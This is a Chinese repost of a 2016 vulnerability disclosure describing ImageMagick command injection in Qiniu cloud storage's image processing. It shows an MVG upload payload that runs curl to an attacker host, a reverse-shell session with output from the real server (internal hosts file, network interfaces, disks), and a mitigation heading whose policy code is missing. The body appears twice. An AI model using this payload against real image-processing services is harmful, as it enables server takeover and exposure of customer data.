七牛云存储远程命令执行漏洞影响图片处理服务器
程序员文章站
2022-03-29 12:04:29
七牛云存储远程命令执行漏洞影响图片处理服务器
七牛云存储在业务中使用了 ImageMagick 对程序进行处理,由于该软件(扩展)存在命令执行漏洞,所以导致可以直接获取七牛云存储服务器权限。...
七牛云存储远程命令执行漏洞影响图片处理服务器
七牛云存储在业务中使用了 ImageMagick 对程序进行处理,由于该软件(扩展)存在命令执行漏洞,所以导致可以直接获取七牛云存储服务器权限。
漏洞详情请参考:
http://www.openwall.com/lists/oss-security/2016/05/03/18
具体利用过程:调用七牛云存储上传图片,图片内容为:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)' pop graphic-context
我的服务器 web 日志能够收到如下请求:
183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
证明服务器能够执行命令,反弹 shell 到本地:
[email protected]:/home/qboxserver$ /sbin/ifconfig /sbin/ifconfig bond0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31 inet addr:192.168.39.56 Bcast:192.168.39.255 Mask:255.255.255.0 inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link UP BROADCAST RUNNING MASTER MULTICAST MTU:1500 Metric:1 RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139 TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2185589994172355 (2.1 PB) TX bytes:2267435507197833 (2.2 PB) eth0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139 TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1137441591036452 (1.1 PB) TX bytes:1174420660158860 (1.1 PB) Memory:df7a0000-df7c0000 eth2 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0 TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1048148403135903 (1.0 PB) TX bytes:1093014847038820 (1.0 PB) Memory:df920000-df940000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0 TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:271458766242099 (271.4 TB) TX bytes:271458766242099 (271.4 TB) [email protected]:/home/qboxserver$
[email protected]:/home/qboxserver$ cat /etc/hosts cat /etc/hosts 127.0.0.1 localhost nb443 ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 192.168.1.188 salt puppetmaster 192.168.33.200 zabbixserver bosunserver fileserver.qbox.me 192.168.34.129 nb.fileserver.qbox.me 192.168.48.248 ntp.ubuntu.com 172.16.77.202 qmaster2 172.16.77.201 qmaster1 172.16.77.201 qmaster1 172.16.77.202 qmaster2
[email protected]:/home/qboxserver$ df -h df -h Filesystem Size Used Avail Use% Mounted on /dev/sda5 279G 75G 190G 29% / udev 16G 12K 16G 1% /dev tmpfs 6.3G 392K 6.3G 1% /run none 5.0M 0 5.0M 0% /run/lock none 16G 60K 16G 1% /run/shm /dev/sde1 3.7T 3.2T 293G 92% /disk1 /dev/sdc1 3.7T 3.3T 220G 94% /disk2 /dev/sdb1 3.7T 3.3T 254G 93% /disk3 /dev/sdd1 3.7T 3.2T 283G 93% /disk4 /dev/sdg1 3.7T 3.3T 203G 95% /disk5 /dev/sdi1 3.7T 3.2T 278G 93% /disk6 /dev/sdh1 3.7T 3.2T 285G 92% /disk7 /dev/sdj1 3.7T 3.3T 245G 94% /disk8 /dev/sdk1 3.7T 3.2T 301G 92% /disk9 /dev/sdl1 3.7T 3.2T 262G 93% /disk10 /dev/sdm1 3.7T 3.3T 256G 93% /disk11 /dev/sdf1 3.7T 56G 3.4T 2% /disk12
挂载了这么多磁盘,有将近 40T 的数据,猜测都是客户上传的静态资源。
七牛云存储在业务中使用了 ImageMagick 对程序进行处理,由于该软件(扩展)存在命令执行漏洞,所以导致可以直接获取七牛云存储服务器权限。
漏洞详情请参考:
http://www.openwall.com/lists/oss-security/2016/05/03/18
具体利用过程:调用七牛云存储上传图片,图片内容为:
push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|curl "*.*.*.*)' pop graphic-context
我的服务器 web 日志能够收到如下请求:
183.136.128.155 - - [05/May/2016:11:34:30 +0800] "GET / HTTP/1.1" 200 11359 "-" "curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
证明服务器能够执行命令,反弹 shell 到本地:
[email protected]:/home/qboxserver$ /sbin/ifconfig /sbin/ifconfig bond0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31 inet addr:192.168.39.56 Bcast:192.168.39.255 Mask:255.255.255.0 inet6 addr: fe80::6e92:bfff:fe08:4231/64 Scope:Link UP BROADCAST RUNNING MASTER MULTICAST MTU:1500 Metric:1 RX packets:1954421513004 errors:296 dropped:109669460 overruns:89056 frame:139 TX packets:1830543349326 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2185589994172355 (2.1 PB) TX bytes:2267435507197833 (2.2 PB) eth0 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:1015834290209 errors:296 dropped:3 overruns:57652 frame:139 TX packets:949789646132 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1137441591036452 (1.1 PB) TX bytes:1174420660158860 (1.1 PB) Memory:df7a0000-df7c0000 eth2 Link encap:Ethernet HWaddr 6c:92:bf:08:42:31 UP BROADCAST RUNNING SLAVE MULTICAST MTU:1500 Metric:1 RX packets:938587222795 errors:0 dropped:3 overruns:31404 frame:0 TX packets:880753703193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1048148403135903 (1.0 PB) TX bytes:1093014847038820 (1.0 PB) Memory:df920000-df940000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:41448226032 errors:0 dropped:0 overruns:0 frame:0 TX packets:41448226032 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:271458766242099 (271.4 TB) TX bytes:271458766242099 (271.4 TB) [email protected]:/home/qboxserver$
[email protected]:/home/qboxserver$ cat /etc/hosts cat /etc/hosts 127.0.0.1 localhost nb443 ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 192.168.1.188 salt puppetmaster 192.168.33.200 zabbixserver bosunserver fileserver.qbox.me 192.168.34.129 nb.fileserver.qbox.me 192.168.48.248 ntp.ubuntu.com 172.16.77.202 qmaster2 172.16.77.201 qmaster1 172.16.77.201 qmaster1 172.16.77.202 qmaster2
[email protected]:/home/qboxserver$ df -h df -h Filesystem Size Used Avail Use% Mounted on /dev/sda5 279G 75G 190G 29% / udev 16G 12K 16G 1% /dev tmpfs 6.3G 392K 6.3G 1% /run none 5.0M 0 5.0M 0% /run/lock none 16G 60K 16G 1% /run/shm /dev/sde1 3.7T 3.2T 293G 92% /disk1 /dev/sdc1 3.7T 3.3T 220G 94% /disk2 /dev/sdb1 3.7T 3.3T 254G 93% /disk3 /dev/sdd1 3.7T 3.2T 283G 93% /disk4 /dev/sdg1 3.7T 3.3T 203G 95% /disk5 /dev/sdi1 3.7T 3.2T 278G 93% /disk6 /dev/sdh1 3.7T 3.2T 285G 92% /disk7 /dev/sdj1 3.7T 3.3T 245G 94% /disk8 /dev/sdk1 3.7T 3.2T 301G 92% /disk9 /dev/sdl1 3.7T 3.2T 262G 93% /disk10 /dev/sdm1 3.7T 3.3T 256G 93% /disk11 /dev/sdf1 3.7T 56G 3.4T 2% /disk12
挂载了这么多磁盘,有将近 40T 的数据,猜测都是客户上传的静态资源。
解决方案:
使用策略文件暂时禁用ImageMagick。可在“/etc/ImageMagick/policy.xml”文件中添加如下代码: